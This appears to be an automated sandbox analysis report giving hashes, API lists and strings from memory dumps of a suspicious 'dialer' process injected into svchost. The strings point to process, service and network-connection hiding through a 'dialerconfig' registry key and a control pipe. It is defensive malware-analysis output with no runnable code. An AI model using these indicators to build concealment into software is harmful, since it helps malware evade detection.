• API String ID: 4184240511-3881820561
• Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
• Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
• Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
• Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\dialerconfig
• API String ID: 3013565938-461861421
• Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
• Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
• Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
• Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: File$Write$CloseCreateHandle
• String ID: \\.\pipe\dialercontrol_redirect64
• API String ID: 148219782-3440882674
• Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
• Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
• Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
• Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ntdll.dll
• API String ID: 1646373207-2227199552
• Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
• Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
• Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
• Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

Callgraph

callgraph: function call graph of the module loaded at 0000000140000000 (rendered graph; node list and edges omitted)

Control-flow Graph

APIs
• NtFlushVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
Memory Dump Source
• Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
Similarity
• API ID: FlushMemoryVirtual
• String ID:
• API String ID: 3327305600-0
• Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
• Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
• Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
• Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40

Control-flow Graph

control_flow_graph: function starting at 1400026e0 (rendered graph; node layout and edge list omitted)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$\BaseNamedObjects\fzjpudgzjtiqjjkhgcgqpixo$`
                                                                          • API String ID: 597572034-2421778612
                                                                          • Opcode ID: 7ae1bb7e4b724b2ef69abbdd7b91bcb67c75066fc2420774548d9815dca7bf36
                                                                          • Instruction ID: 82904f839f72ce91394cb6233b55af986959722d867cc147669b016d1af11518
                                                                          • Opcode Fuzzy Hash: 7ae1bb7e4b724b2ef69abbdd7b91bcb67c75066fc2420774548d9815dca7bf36
                                                                          • Instruction Fuzzy Hash: 9A1259B2608B8481E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                                                          • Instruction ID: 463d8eadf6764cf81835e2f5447ee9fd2fbaf236c41788732bd38f3ca502ba48
                                                                          • Opcode Fuzzy Hash: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                                                          • Instruction Fuzzy Hash: 5A5123B1611A4085FB16EF27F9947EA27A5AB8D7D0F849121FB4D873B6DE38C4958300

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                                                          • Instruction ID: 5c7ee5ee1b8a04923d5a96a0df04d384374ee326a967495c8333b08c7993e382
                                                                          • Opcode Fuzzy Hash: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                                                          • Instruction Fuzzy Hash: 294143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                                                          • Instruction ID: 85fbb11ae3983d049e5aa99e15e4bef804ab9b98c2283f83d64eac87ba6817d4
                                                                          • Opcode Fuzzy Hash: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                                                          • Instruction Fuzzy Hash: 9221E3B0705A0292FA5BEB53F9583E92360B76CBD0F444021FB1E476B4DB7A8986C300

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                                          • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                                                          • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                                          • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                                                          • Instruction ID: 5534edb58951571e9cddb68e2d52a890a1341d8cf7b14363ea8337f027b41872
                                                                          • Opcode Fuzzy Hash: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                                                          • Instruction Fuzzy Hash: 215114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                                          • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                                                          • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                                          • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002D.00000002.3586479201.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002D.00000002.3586096663.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3586840968.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587189398.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002D.00000002.3587484089.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                                                          • Instruction ID: fd5d896073a876b2497a5a253350f949cfb4402a0739e06ef74f700dacb1e49b
                                                                          • Opcode Fuzzy Hash: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                                                          • Instruction Fuzzy Hash: 0801AFB5705A0192FA5BDB53FE083E86260B76CBD1F454021EF0953AB4DB798996C200

                                                                          Callgraph


                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002F.00000002.3586212031.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002F.00000002.3585787306.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3586212031.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3586212031.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3586212031.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3586212031.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3586212031.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002F.00000002.3597550484.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_47_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 1941872368-0
                                                                          • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                          • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C
                                                                          APIs
                                                                            • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
                                                                            • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                          • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                          • SleepEx.KERNEL32 ref: 00000257E10A1ADD
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228

Control-flow Graph: function 257e107273c (basic blocks 257e107273c to 257e10729d0); calls LoadLibraryA and the sub-function 257e10729d4 (x4); executed/not-executed colouring and graph rendering not reproduced.
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

Control-flow Graph: function 257e10a2b2c (basic blocks 257e10a2b2c to 257e10a2f03); calls GetModuleHandleA, StrCmpNIW, lstrlenW (x2) and the sub-functions 257e10c2ce0, 257e10b6090, 257e10a199c, 257e10a1bbc, 257e10a3844, 257e10a152c and 257e10a85c0; executed/not-executed colouring and graph rendering not reproduced.
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704
                                                                          Memory Dump Source
